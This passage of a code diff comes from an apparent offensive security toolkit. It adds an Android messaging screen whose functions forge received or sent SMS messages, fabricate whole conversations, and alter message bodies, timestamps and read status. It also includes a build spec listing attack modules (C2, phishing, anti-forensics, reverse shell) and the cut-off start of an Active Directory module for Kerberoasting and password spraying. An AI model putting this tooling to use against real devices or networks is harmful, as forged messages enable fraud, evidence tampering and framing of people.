btnThreadExport = view.findViewById(R.id.btn_thread_export) + inputMessage = 
view.findViewById(R.id.input_message) + btnSend = view.findViewById(R.id.btn_send) + + // Output log + outputLogCard = view.findViewById(R.id.output_log_card) + outputLog = view.findViewById(R.id.messaging_output_log) + btnCloseLog = view.findViewById(R.id.btn_close_log) + } + + // ── Conversation list ────────────────────────────────────────── + + private fun setupConversationList() { + conversationAdapter = ConversationAdapter(mutableListOf()) { conversation -> + openThread(conversation) + } + + recyclerConversations.apply { + layoutManager = LinearLayoutManager(requireContext()) + adapter = conversationAdapter + } + + fabNewMessage.setOnClickListener { + showForgeMessageDialog() + } + } + + private fun loadConversations() { + Thread { + val conversations = repo.getConversations() + handler.post { + conversationAdapter.updateData(conversations) + if (conversations.isEmpty()) { + emptyState.visibility = View.VISIBLE + recyclerConversations.visibility = View.GONE + } else { + emptyState.visibility = View.GONE + recyclerConversations.visibility = View.VISIBLE + } + } + }.start() + } + + // ── Thread view ──────────────────────────────────────────────── + + private fun setupThreadView() { + messageAdapter = MessageAdapter(mutableListOf()) { message -> + showMessageContextMenu(message) + } + + recyclerMessages.apply { + layoutManager = LinearLayoutManager(requireContext()).apply { + stackFromEnd = true + } + adapter = messageAdapter + } + + btnBack.setOnClickListener { + closeThread() + } + + btnSend.setOnClickListener { + sendMessage() + } + + btnThreadExport.setOnClickListener { + exportCurrentThread() + } + } + + private fun openThread(conversation: MessagingRepository.Conversation) { + currentThreadId = conversation.threadId + currentAddress = conversation.address + + val displayName = conversation.contactName ?: conversation.address + threadContactName.text = displayName + threadAddress.text = if (conversation.contactName != null) conversation.address else "" + + 
// Mark as read + Thread { + repo.markAsRead(conversation.threadId) + }.start() + + // Load messages + loadMessages(conversation.threadId) + + // Switch views + conversationListContainer.visibility = View.GONE + threadViewContainer.visibility = View.VISIBLE + } + + private fun closeThread() { + currentThreadId = -1 + currentAddress = "" + + threadViewContainer.visibility = View.GONE + conversationListContainer.visibility = View.VISIBLE + + // Refresh conversations to update unread counts + loadConversations() + } + + private fun loadMessages(threadId: Long) { + Thread { + val messages = repo.getMessages(threadId) + handler.post { + messageAdapter.updateData(messages) + // Scroll to bottom + if (messages.isNotEmpty()) { + recyclerMessages.scrollToPosition(messages.size - 1) + } + } + }.start() + } + + private fun sendMessage() { + val body = inputMessage.text?.toString()?.trim() ?: return + if (body.isEmpty()) return + + inputMessage.setText("") + + Thread { + val success = repo.sendSms(currentAddress, body) + handler.post { + if (success) { + // Reload messages to show the sent message + loadMessages(currentThreadId) + } else { + // If we can't send (not default SMS), try forge as sent + val id = repo.forgeMessage( + currentAddress, body, + MessagingRepository.MESSAGE_TYPE_SENT, + System.currentTimeMillis(), read = true + ) + if (id >= 0) { + loadMessages(currentThreadId) + appendLog("Message inserted (forge mode — not actually sent)") + } else { + appendLog("Failed to send/insert — need default SMS app role") + Toast.makeText(requireContext(), + "Cannot send — set as default SMS app first", + Toast.LENGTH_SHORT).show() + } + } + } + }.start() + } + + private fun exportCurrentThread() { + if (currentThreadId < 0) return + + Thread { + val result = ModuleManager.executeAction("messaging", "export_thread:$currentThreadId", requireContext()) + handler.post { + appendLog(result.output) + for (detail in result.details) { + appendLog(" $detail") + } + showOutputLog() + } 
+ }.start() + } + + // ── Search ───────────────────────────────────────────────────── + + private fun setupSearch() { + btnSearch.setOnClickListener { + if (searchBar.visibility == View.VISIBLE) { + searchBar.visibility = View.GONE + } else { + searchBar.visibility = View.VISIBLE + inputSearch.requestFocus() + } + } + + btnSearchGo.setOnClickListener { + val query = inputSearch.text?.toString()?.trim() ?: "" + if (query.isNotEmpty()) { + performSearch(query) + } + } + + btnSearchClose.setOnClickListener { + searchBar.visibility = View.GONE + inputSearch.setText("") + loadConversations() + } + } + + private fun performSearch(query: String) { + Thread { + val results = repo.searchMessages(query) + handler.post { + if (results.isEmpty()) { + appendLog("No results for '$query'") + showOutputLog() + } else { + // Group results by thread and show as conversations + val threadGroups = results.groupBy { it.threadId } + val conversations = threadGroups.map { (threadId, msgs) -> + val first = msgs.first() + MessagingRepository.Conversation( + threadId = threadId, + address = first.address, + snippet = "[${msgs.size} matches] ${first.body.take(40)}", + date = first.date, + messageCount = msgs.size, + unreadCount = 0, + contactName = first.contactName + ) + }.sortedByDescending { it.date } + + conversationAdapter.updateData(conversations) + emptyState.visibility = View.GONE + recyclerConversations.visibility = View.VISIBLE + appendLog("Found ${results.size} messages in ${conversations.size} threads") + } + } + }.start() + } + + // ── Toolbar actions ──────────────────────────────────────────── + + private fun setupToolbar() { + btnDefaultSms.setOnClickListener { + toggleDefaultSms() + } + + btnTools.setOnClickListener { anchor -> + showToolsMenu(anchor) + } + } + + private fun toggleDefaultSms() { + Thread { + if (!isDefaultSms) { + val result = ModuleManager.executeAction("messaging", "become_default", requireContext()) + handler.post { + if (result.success) { + isDefaultSms 
= true + btnDefaultSms.text = getString(R.string.messaging_restore_default) + appendLog("Archon is now default SMS app") + } else { + appendLog("Failed: ${result.output}") + } + showOutputLog() + } + } else { + val result = ModuleManager.executeAction("messaging", "restore_default", requireContext()) + handler.post { + if (result.success) { + isDefaultSms = false + btnDefaultSms.text = getString(R.string.messaging_become_default) + appendLog("Default SMS app restored") + } else { + appendLog("Failed: ${result.output}") + } + showOutputLog() + } + } + }.start() + } + + private fun showToolsMenu(anchor: View) { + val popup = PopupMenu(requireContext(), anchor) + popup.menu.add(0, 1, 0, "Export All Messages") + popup.menu.add(0, 2, 1, "Forge Message") + popup.menu.add(0, 3, 2, "Forge Conversation") + popup.menu.add(0, 4, 3, "RCS Status") + popup.menu.add(0, 5, 4, "Shizuku Status") + popup.menu.add(0, 6, 5, "Intercept Mode ON") + popup.menu.add(0, 7, 6, "Intercept Mode OFF") + + popup.setOnMenuItemClickListener { item -> + when (item.itemId) { + 1 -> executeModuleAction("export_all") + 2 -> showForgeMessageDialog() + 3 -> showForgeConversationDialog() + 4 -> executeModuleAction("rcs_status") + 5 -> executeModuleAction("shizuku_status") + 6 -> executeModuleAction("intercept_mode:on") + 7 -> executeModuleAction("intercept_mode:off") + } + true + } + + popup.show() + } + + private fun executeModuleAction(actionId: String) { + appendLog("Running: $actionId...") + showOutputLog() + + Thread { + val result = ModuleManager.executeAction("messaging", actionId, requireContext()) + handler.post { + appendLog(result.output) + for (detail in result.details.take(20)) { + appendLog(" $detail") + } + } + }.start() + } + + // ── Shizuku status ───────────────────────────────────────────── + + private fun refreshShizukuStatus() { + Thread { + val ready = shizuku.isReady() + handler.post { + setStatusDot(shizukuDot, ready) + } + }.start() + } + + private fun setStatusDot(dot: View, 
online: Boolean) { + val drawable = GradientDrawable() + drawable.shape = GradientDrawable.OVAL + drawable.setColor(if (online) Color.parseColor("#00FF41") else Color.parseColor("#666666")) + dot.background = drawable + } + + // ── Message context menu (long-press) ────────────────────────── + + private fun showMessageContextMenu(message: MessagingRepository.Message) { + val items = arrayOf( + "Copy", + "Edit Body", + "Delete", + "Change Timestamp", + "Spoof Read Status", + "Forward (Forge)" + ) + + AlertDialog.Builder(requireContext()) + .setTitle("Message Options") + .setItems(items) { _, which -> + when (which) { + 0 -> copyMessage(message) + 1 -> editMessageBody(message) + 2 -> deleteMessage(message) + 3 -> changeTimestamp(message) + 4 -> spoofReadStatus(message) + 5 -> forwardAsForge(message) + } + } + .show() + } + + private fun copyMessage(message: MessagingRepository.Message) { + val clipboard = requireContext().getSystemService(android.content.ClipboardManager::class.java) + val clip = android.content.ClipData.newPlainText("sms", message.body) + clipboard?.setPrimaryClip(clip) + Toast.makeText(requireContext(), "Copied to clipboard", Toast.LENGTH_SHORT).show() + } + + private fun editMessageBody(message: MessagingRepository.Message) { + val input = TextInputEditText(requireContext()).apply { + setText(message.body) + setTextColor(resources.getColor(R.color.text_primary, null)) + setBackgroundColor(resources.getColor(R.color.surface_dark, null)) + setPadding(32, 24, 32, 24) + } + + AlertDialog.Builder(requireContext()) + .setTitle("Edit Message Body") + .setView(input) + .setPositiveButton("Save") { _, _ -> + val newBody = input.text?.toString() ?: return@setPositiveButton + Thread { + val success = repo.updateMessage(message.id, body = newBody, type = null, date = null, read = null) + handler.post { + if (success) { + appendLog("Updated message ${message.id}") + loadMessages(currentThreadId) + } else { + appendLog("Failed to update — need default SMS app 
role") + } + showOutputLog() + } + }.start() + } + .setNegativeButton("Cancel", null) + .show() + } + + private fun deleteMessage(message: MessagingRepository.Message) { + AlertDialog.Builder(requireContext()) + .setTitle("Delete Message") + .setMessage("Delete this message permanently?\n\n\"${message.body.take(60)}\"") + .setPositiveButton("Delete") { _, _ -> + Thread { + val success = repo.deleteMessage(message.id) + handler.post { + if (success) { + appendLog("Deleted message ${message.id}") + loadMessages(currentThreadId) + } else { + appendLog("Failed to delete — need default SMS app role") + } + showOutputLog() + } + }.start() + } + .setNegativeButton("Cancel", null) + .show() + } + + private fun changeTimestamp(message: MessagingRepository.Message) { + val cal = Calendar.getInstance() + cal.timeInMillis = message.date + + DatePickerDialog(requireContext(), { _, year, month, day -> + TimePickerDialog(requireContext(), { _, hour, minute -> + cal.set(year, month, day, hour, minute) + val newDate = cal.timeInMillis + + Thread { + val success = repo.updateMessage(message.id, body = null, type = null, date = newDate, read = null) + handler.post { + if (success) { + val fmt = SimpleDateFormat("yyyy-MM-dd HH:mm", Locale.US) + appendLog("Changed timestamp to ${fmt.format(Date(newDate))}") + loadMessages(currentThreadId) + } else { + appendLog("Failed to change timestamp") + } + showOutputLog() + } + }.start() + }, cal.get(Calendar.HOUR_OF_DAY), cal.get(Calendar.MINUTE), true).show() + }, cal.get(Calendar.YEAR), cal.get(Calendar.MONTH), cal.get(Calendar.DAY_OF_MONTH)).show() + } + + private fun spoofReadStatus(message: MessagingRepository.Message) { + val items = arrayOf("Mark as Read", "Mark as Unread") + AlertDialog.Builder(requireContext()) + .setTitle("Read Status") + .setItems(items) { _, which -> + val newRead = which == 0 + Thread { + val success = repo.updateMessage(message.id, body = null, type = null, date = null, read = newRead) + handler.post { + if 
(success) { + appendLog("Set read=${newRead} for message ${message.id}") + loadMessages(currentThreadId) + } else { + appendLog("Failed to update read status") + } + showOutputLog() + } + }.start() + } + .show() + } + + private fun forwardAsForge(message: MessagingRepository.Message) { + // Pre-fill the forge dialog with this message's body + showForgeMessageDialog(prefillBody = message.body) + } + + // ── Forge dialogs ────────────────────────────────────────────── + + private fun showForgeMessageDialog(prefillBody: String? = null) { + val dialogView = LayoutInflater.from(requireContext()) + .inflate(R.layout.dialog_forge_message, null) + + val forgeAddress = dialogView.findViewById(R.id.forge_address) + val forgeContactName = dialogView.findViewById(R.id.forge_contact_name) + val forgeBody = dialogView.findViewById(R.id.forge_body) + val forgeTypeReceived = dialogView.findViewById(R.id.forge_type_received) + val forgeTypeSent = dialogView.findViewById(R.id.forge_type_sent) + val forgePickDate = dialogView.findViewById(R.id.forge_pick_date) + val forgePickTime = dialogView.findViewById(R.id.forge_pick_time) + val forgeReadStatus = dialogView.findViewById(R.id.forge_read_status) + + prefillBody?.let { forgeBody.setText(it) } + + // If we're in a thread, prefill the address + if (currentAddress.isNotEmpty()) { + forgeAddress.setText(currentAddress) + } + + // Direction toggle + var selectedType = MessagingRepository.MESSAGE_TYPE_RECEIVED + forgeTypeReceived.setOnClickListener { + selectedType = MessagingRepository.MESSAGE_TYPE_RECEIVED + forgeTypeReceived.tag = "selected" + forgeTypeSent.tag = null + } + forgeTypeSent.setOnClickListener { + selectedType = MessagingRepository.MESSAGE_TYPE_SENT + forgeTypeSent.tag = "selected" + forgeTypeReceived.tag = null + } + + // Date/time pickers + forgeCalendar = Calendar.getInstance() + val dateFormat = SimpleDateFormat("MMM dd, yyyy", Locale.US) + val timeFormat = SimpleDateFormat("HH:mm", Locale.US) + forgePickDate.text = 
dateFormat.format(forgeCalendar.time) + forgePickTime.text = timeFormat.format(forgeCalendar.time) + + forgePickDate.setOnClickListener { + DatePickerDialog(requireContext(), { _, year, month, day -> + forgeCalendar.set(Calendar.YEAR, year) + forgeCalendar.set(Calendar.MONTH, month) + forgeCalendar.set(Calendar.DAY_OF_MONTH, day) + forgePickDate.text = dateFormat.format(forgeCalendar.time) + }, forgeCalendar.get(Calendar.YEAR), forgeCalendar.get(Calendar.MONTH), + forgeCalendar.get(Calendar.DAY_OF_MONTH)).show() + } + + forgePickTime.setOnClickListener { + TimePickerDialog(requireContext(), { _, hour, minute -> + forgeCalendar.set(Calendar.HOUR_OF_DAY, hour) + forgeCalendar.set(Calendar.MINUTE, minute) + forgePickTime.text = timeFormat.format(forgeCalendar.time) + }, forgeCalendar.get(Calendar.HOUR_OF_DAY), forgeCalendar.get(Calendar.MINUTE), true).show() + } + + AlertDialog.Builder(requireContext()) + .setView(dialogView) + .setPositiveButton("Forge") { _, _ -> + val address = forgeAddress.text?.toString()?.trim() ?: "" + val contactName = forgeContactName.text?.toString()?.trim() + val body = forgeBody.text?.toString()?.trim() ?: "" + val read = forgeReadStatus.isChecked + val date = forgeCalendar.timeInMillis + + if (address.isEmpty() || body.isEmpty()) { + Toast.makeText(requireContext(), "Address and body required", Toast.LENGTH_SHORT).show() + return@setPositiveButton + } + + Thread { + val id = repo.forgeMessage( + address = address, + body = body, + type = selectedType, + date = date, + contactName = contactName, + read = read + ) + handler.post { + if (id >= 0) { + val direction = if (selectedType == 1) "received" else "sent" + appendLog("Forged $direction message id=$id to $address") + showOutputLog() + + // Refresh view + if (currentThreadId > 0) { + loadMessages(currentThreadId) + } else { + loadConversations() + } + } else { + appendLog("Forge failed — need default SMS app role") + showOutputLog() + } + } + }.start() + } + .setNegativeButton("Cancel", 
null) + .show() + } + + private fun showForgeConversationDialog() { + val input = TextInputEditText(requireContext()).apply { + hint = "Phone number (e.g. +15551234567)" + setTextColor(resources.getColor(R.color.text_primary, null)) + setHintTextColor(resources.getColor(R.color.text_muted, null)) + setBackgroundColor(resources.getColor(R.color.surface_dark, null)) + setPadding(32, 24, 32, 24) + inputType = android.text.InputType.TYPE_CLASS_PHONE + } + + AlertDialog.Builder(requireContext()) + .setTitle("Forge Conversation") + .setMessage("Create a fake conversation with back-and-forth messages from this number:") + .setView(input) + .setPositiveButton("Forge") { _, _ -> + val address = input.text?.toString()?.trim() ?: "" + if (address.isEmpty()) { + Toast.makeText(requireContext(), "Phone number required", Toast.LENGTH_SHORT).show() + return@setPositiveButton + } + executeModuleAction("forge_conversation:$address") + // Refresh after a short delay for the inserts to complete + handler.postDelayed({ loadConversations() }, 2000) + } + .setNegativeButton("Cancel", null) + .show() + } + + // ── Output log ───────────────────────────────────────────────── + + private fun setupOutputLog() { + btnCloseLog.setOnClickListener { + outputLogCard.visibility = View.GONE + } + } + + private fun showOutputLog() { + outputLogCard.visibility = View.VISIBLE + } + + private fun appendLog(msg: String) { + val current = outputLog.text.toString() + val lines = current.split("\n").takeLast(30) + outputLog.text = (lines + "> $msg").joinToString("\n") + } +} diff --git a/autarch_companion/app/src/main/res/layout/dialog_forge_message.xml b/autarch_companion/app/src/main/res/layout/dialog_forge_message.xml new file mode 100644 index 0000000..d34c48f --- /dev/null +++ b/autarch_companion/app/src/main/res/layout/dialog_forge_message.xml @@ -0,0 +1,203 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git 
a/autarch_companion/app/src/main/res/layout/fragment_messaging.xml b/autarch_companion/app/src/main/res/layout/fragment_messaging.xml new file mode 100644 index 0000000..f73b14c --- /dev/null +++ b/autarch_companion/app/src/main/res/layout/fragment_messaging.xml @@ -0,0 +1,340 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/autarch_companion/app/src/main/res/layout/item_conversation.xml b/autarch_companion/app/src/main/res/layout/item_conversation.xml new file mode 100644 index 0000000..b3abf62 --- /dev/null +++ b/autarch_companion/app/src/main/res/layout/item_conversation.xml @@ -0,0 +1,92 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/autarch_companion/app/src/main/res/layout/item_message_received.xml b/autarch_companion/app/src/main/res/layout/item_message_received.xml new file mode 100644 index 0000000..93a34d1 --- /dev/null +++ b/autarch_companion/app/src/main/res/layout/item_message_received.xml @@ -0,0 +1,67 @@ + + + + + + + + + + + + + + + + + + + + + diff --git a/autarch_companion/app/src/main/res/layout/item_message_sent.xml b/autarch_companion/app/src/main/res/layout/item_message_sent.xml new file mode 100644 index 0000000..6b2d5ec --- /dev/null +++ b/autarch_companion/app/src/main/res/layout/item_message_sent.xml @@ -0,0 +1,78 @@ + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/autarch_companion/app/src/main/res/menu/bottom_nav.xml b/autarch_companion/app/src/main/res/menu/bottom_nav.xml index 1237016..3cffc12 100644 --- a/autarch_companion/app/src/main/res/menu/bottom_nav.xml +++ b/autarch_companion/app/src/main/res/menu/bottom_nav.xml @@ -5,9 +5,9 @@ android:icon="@android:drawable/ic_menu_compass" android:title="@string/nav_dashboard" /> + android:id="@+id/nav_messaging" + android:icon="@android:drawable/ic_dialog_email" + 
android:title="@string/nav_messaging" /> + + Offense Settings + + Messages + SMS/RCS + DEFAULT + RESTORE + TOOLS + Search messages... + Type a message... + SEND + EXPORT + New message + No conversations found.\nCheck SMS permissions or tap + to forge a message. + + + FORGE MESSAGE + Phone Number + +15551234567 + Contact Name (optional) + John Doe + Message Body + Enter message text... + Direction + RECEIVED + SENT + Date / Time + Date + Time + Mark as read + SETTINGS Server Connection diff --git a/autarch_public.spec b/autarch_public.spec new file mode 100644 index 0000000..d28b779 --- /dev/null +++ b/autarch_public.spec @@ -0,0 +1,287 @@ +# -*- mode: python ; coding: utf-8 -*- +# PyInstaller spec for AUTARCH Public Release +# +# Build: pyinstaller autarch_public.spec +# Output: dist/autarch/ +# ├── autarch.exe (CLI — full framework, console window) +# └── autarch_web.exe (Web — double-click to launch dashboard + tray icon, no console) + +import sys +from pathlib import Path + +SRC = Path(SPECPATH) + +block_cipher = None + +# ── Data files (non-Python assets to bundle) ───────────────────────────────── +# Only include files that actually exist to prevent build failures +_candidate_files = [ + # Web assets + (SRC / 'web' / 'templates', 'web/templates'), + (SRC / 'web' / 'static', 'web/static'), + + # Data (SQLite DBs, site lists, config defaults) + (SRC / 'data', 'data'), + + # Modules directory (dynamically loaded at runtime) + (SRC / 'modules', 'modules'), + + # Icon + (SRC / 'autarch.ico', '.'), + + # DNS server binary + (SRC / 'services' / 'dns-server' / 'autarch-dns.exe', 'services/dns-server'), + + # Root-level config and docs + (SRC / 'autarch_settings.conf', '.'), + (SRC / 'user_manual.md', '.'), + (SRC / 'windows_manual.md', '.'), + (SRC / 'custom_sites.inf', '.'), + (SRC / 'custom_adultsites.json', '.'), +] + +added_files = [(str(src), dst) for src, dst in _candidate_files if src.exists()] + +# ── Hidden imports 
──────────────────────────────────────────────────────────── +hidden_imports = [ + # Flask ecosystem + 'flask', 'flask.templating', 'jinja2', 'jinja2.ext', + 'werkzeug', 'werkzeug.serving', 'werkzeug.debug', + 'markupsafe', + + # Core libraries + 'bcrypt', 'requests', 'msgpack', 'pyserial', 'qrcode', 'PIL', + 'PIL.Image', 'PIL.ImageDraw', 'PIL.ImageFont', 'cryptography', + + # System tray + 'pystray', 'pystray._win32', + + # AUTARCH core modules + 'core.config', 'core.paths', 'core.banner', 'core.menu', 'core.tray', + 'core.llm', 'core.agent', 'core.tools', + 'core.msf', 'core.msf_interface', + 'core.hardware', 'core.android_protect', + 'core.upnp', 'core.wireshark', 'core.wireguard', + 'core.mcp_server', 'core.discovery', + 'core.osint_db', 'core.nvd', + 'core.model_router', 'core.rules', 'core.autonomy', + + # Web routes (Flask blueprints) + 'web.app', 'web.auth', + 'web.routes.auth_routes', + 'web.routes.dashboard', + 'web.routes.defense', + 'web.routes.offense', + 'web.routes.counter', + 'web.routes.analyze', + 'web.routes.osint', + 'web.routes.simulate', + 'web.routes.settings', + 'web.routes.upnp', + 'web.routes.wireshark', + 'web.routes.hardware', + 'web.routes.android_exploit', + 'web.routes.iphone_exploit', + 'web.routes.android_protect', + 'web.routes.wireguard', + 'web.routes.revshell', + 'web.routes.archon', + 'web.routes.msf', + 'web.routes.chat', + 'web.routes.targets', + 'web.routes.encmodules', + 'web.routes.llm_trainer', + 'web.routes.autonomy', + 'web.routes.loadtest', + 'web.routes.phishmail', + 'web.routes.dns_service', + 'web.routes.ipcapture', + 'web.routes.hack_hijack', + 'web.routes.password_toolkit', + 'web.routes.webapp_scanner', + 'web.routes.report_engine', + 'web.routes.net_mapper', + 'web.routes.c2_framework', + 'web.routes.wifi_audit', + 'web.routes.threat_intel', + 'web.routes.steganography', + 'web.routes.api_fuzzer', + 'web.routes.ble_scanner', + 'web.routes.forensics', + 'web.routes.rfid_tools', + 'web.routes.cloud_scan', + 
'web.routes.malware_sandbox', + 'web.routes.log_correlator', + 'web.routes.anti_forensics', + 'web.routes.vuln_scanner', + 'web.routes.exploit_dev', + 'web.routes.social_eng', + 'web.routes.ad_audit', + 'web.routes.mitm_proxy', + 'web.routes.pineapple', + 'web.routes.deauth', + 'web.routes.reverse_eng', + 'web.routes.sdr_tools', + 'web.routes.container_sec', + 'web.routes.email_sec', + 'web.routes.incident_resp', + 'modules.loadtest', + 'modules.phishmail', + 'modules.ipcapture', + 'modules.hack_hijack', + 'modules.password_toolkit', + 'modules.webapp_scanner', + 'modules.report_engine', + 'modules.net_mapper', + 'modules.c2_framework', + 'modules.wifi_audit', + 'modules.threat_intel', + 'modules.steganography', + 'modules.api_fuzzer', + 'modules.ble_scanner', + 'modules.forensics', + 'modules.rfid_tools', + 'modules.cloud_scan', + 'modules.malware_sandbox', + 'modules.log_correlator', + 'modules.anti_forensics', + 'modules.vuln_scanner', + 'modules.exploit_dev', + 'modules.social_eng', + 'modules.ad_audit', + 'modules.mitm_proxy', + 'modules.pineapple', + 'modules.deauth', + 'modules.reverse_eng', + 'modules.sdr_tools', + 'modules.container_sec', + 'modules.email_sec', + 'modules.incident_resp', + 'modules.starlink_hack', + 'modules.sms_forge', + 'web.routes.starlink_hack', + 'web.routes.sms_forge', + 'modules.rcs_tools', + 'web.routes.rcs_tools', + 'core.dns_service', + + # Standard library (sometimes missed on Windows) + 'email.mime.text', 'email.mime.multipart', + 'xml.etree.ElementTree', + 'sqlite3', 'json', 'logging', 'logging.handlers', + 'threading', 'queue', 'uuid', 'hashlib', 'zlib', + 'configparser', 'platform', 'socket', 'shutil', + 'importlib', 'importlib.util', 'importlib.metadata', + 'webbrowser', 'ssl', +] + +excludes = [ + # Exclude heavy optional deps not needed at runtime + 'torch', 'transformers', + 'tkinter', 'matplotlib', 'numpy', + # CUDA / quantization libraries + 'bitsandbytes', + # HuggingFace ecosystem + 'huggingface_hub', 'safetensors', 
'tokenizers', + # MCP/uvicorn/starlette + 'mcp', 'uvicorn', 'starlette', 'anyio', 'httpx', 'httpx_sse', + 'httpcore', 'h11', 'h2', 'hpack', 'hyperframe', + # Pydantic + 'pydantic', 'pydantic_core', 'pydantic_settings', + # Other heavy packages + 'scipy', 'pandas', 'tensorflow', 'keras', + 'IPython', 'notebook', 'jupyterlab', + 'fsspec', 'rich', 'typer', +] + +# ── Analysis for CLI entry point ───────────────────────────────────────────── +a_cli = Analysis( + ['autarch.py'], + pathex=[str(SRC)], + binaries=[], + datas=added_files, + hiddenimports=hidden_imports, + hookspath=[], + hooksconfig={}, + runtime_hooks=[], + excludes=excludes, + noarchive=False, + optimize=0, +) + +# ── Analysis for Web entry point ───────────────────────────────────────────── +a_web = Analysis( + ['autarch_web.py'], + pathex=[str(SRC)], + binaries=[], + datas=added_files, + hiddenimports=hidden_imports, + hookspath=[], + hooksconfig={}, + runtime_hooks=[], + excludes=excludes, + noarchive=False, + optimize=0, +) + +# ── Merge analyses (shared libraries only stored once) ─────────────────────── +MERGE( + (a_cli, 'autarch', 'autarch'), + (a_web, 'autarch_web', 'autarch_web'), +) + +# ── CLI executable (console window) ───────────────────────────────────────── +pyz_cli = PYZ(a_cli.pure, a_cli.zipped_data, cipher=block_cipher) +exe_cli = EXE( + pyz_cli, + a_cli.scripts, + [], + exclude_binaries=True, + name='autarch', + debug=False, + bootloader_ignore_signals=False, + strip=False, + upx=True, + console=True, + disable_windowed_traceback=False, + argv_emulation=False, + target_arch=None, + codesign_identity=None, + entitlements_file=None, + icon=str(SRC / 'autarch.ico'), +) + +# ── Web executable (NO console window — tray icon only) ───────────────────── +pyz_web = PYZ(a_web.pure, a_web.zipped_data, cipher=block_cipher) +exe_web = EXE( + pyz_web, + a_web.scripts, + [], + exclude_binaries=True, + name='autarch_web', + debug=False, + bootloader_ignore_signals=False, + strip=False, + upx=True, + 
console=False, # <-- No console window + disable_windowed_traceback=False, + argv_emulation=False, + target_arch=None, + codesign_identity=None, + entitlements_file=None, + icon=str(SRC / 'autarch.ico'), +) + +# ── Collect everything into one directory ──────────────────────────────────── +coll = COLLECT( + exe_cli, + a_cli.binaries, + a_cli.datas, + exe_web, + a_web.binaries, + a_web.datas, + strip=False, + upx=True, + upx_exclude=[], + name='autarch', +) diff --git a/modules/ad_audit.py b/modules/ad_audit.py new file mode 100644 index 0000000..5579317 --- /dev/null +++ b/modules/ad_audit.py @@ -0,0 +1,1594 @@ +"""AUTARCH Active Directory Audit + +LDAP enumeration, Kerberoasting, AS-REP roasting, ACL analysis, +BloodHound collection, and password spray for AD security assessment. +""" + +import os +import sys +import json +import time +import subprocess +import struct +import random +import threading +from pathlib import Path +from datetime import datetime, timedelta + +# Module metadata +DESCRIPTION = "Active Directory enumeration & attack" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +# Path setup +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return Path(__file__).parent.parent / 'data' + +sys.path.insert(0, str(Path(__file__).parent.parent)) + +try: + from core.banner import Colors, clear_screen, display_banner +except ImportError: + class Colors: + CYAN = YELLOW = GREEN = RED = BOLD = DIM = RESET = WHITE = MAGENTA = "" + def clear_screen(): pass + def display_banner(): pass + +# Optional dependency flags +try: + import ldap3 + from ldap3 import Server, Connection, ALL, NTLM, SUBTREE, ALL_ATTRIBUTES + from ldap3.core.exceptions import LDAPException + HAS_LDAP3 = True +except ImportError: + HAS_LDAP3 = False + +try: + from impacket.ldap import ldap as impacket_ldap + from impacket.ldap import ldapasn1 as ldapasn1 + HAS_IMPACKET_LDAP = True +except ImportError: + HAS_IMPACKET_LDAP = False + +try: + from 
impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS + from impacket.krb5 import constants as krb5_constants + from impacket.krb5.types import Principal, KerberosTime + HAS_IMPACKET_KRB = True +except ImportError: + HAS_IMPACKET_KRB = False + +# AD timestamp epoch: Jan 1, 1601 +AD_EPOCH = datetime(1601, 1, 1) + +# User Account Control flags +UAC_FLAGS = { + 0x0001: 'SCRIPT', + 0x0002: 'ACCOUNTDISABLE', + 0x0008: 'HOMEDIR_REQUIRED', + 0x0010: 'LOCKOUT', + 0x0020: 'PASSWD_NOTREQD', + 0x0040: 'PASSWD_CANT_CHANGE', + 0x0080: 'ENCRYPTED_TEXT_PWD_ALLOWED', + 0x0100: 'TEMP_DUPLICATE_ACCOUNT', + 0x0200: 'NORMAL_ACCOUNT', + 0x0800: 'INTERDOMAIN_TRUST_ACCOUNT', + 0x1000: 'WORKSTATION_TRUST_ACCOUNT', + 0x2000: 'SERVER_TRUST_ACCOUNT', + 0x10000: 'DONT_EXPIRE_PASSWORD', + 0x20000: 'MPC_LOGON_ACCOUNT', + 0x40000: 'SMARTCARD_REQUIRED', + 0x80000: 'TRUSTED_FOR_DELEGATION', + 0x100000: 'NOT_DELEGATED', + 0x200000: 'USE_DES_KEY_ONLY', + 0x400000: 'DONT_REQUIRE_PREAUTH', + 0x800000: 'PASSWORD_EXPIRED', + 0x1000000: 'TRUSTED_TO_AUTH_FOR_DELEGATION', + 0x4000000: 'PARTIAL_SECRETS_ACCOUNT', +} + +# Dangerous ACE rights +DANGEROUS_RIGHTS = { + 'GenericAll': 'Full control over the object', + 'GenericWrite': 'Modify all attributes of the object', + 'WriteOwner': 'Change the owner of the object', + 'WriteDACL': 'Modify the DACL of the object', + 'Self': 'Self-membership — can add self to group', + 'ForceChangePassword': 'Reset the password without knowing current', + 'WriteProperty-Member': 'Can modify group membership', + 'WriteProperty-Script-Path': 'Can modify logon script path', + 'ExtendedRight-User-Force-Change-Password': 'Force password reset', + 'ExtendedRight-DS-Replication-Get-Changes': 'DCSync — replicate directory changes', + 'ExtendedRight-DS-Replication-Get-Changes-All': 'DCSync — replicate all changes including secrets', +} + +# Well-known SIDs +WELL_KNOWN_SIDS = { + 'S-1-5-32-544': 'BUILTIN\\Administrators', + 'S-1-5-32-545': 'BUILTIN\\Users', + 'S-1-5-32-548': 
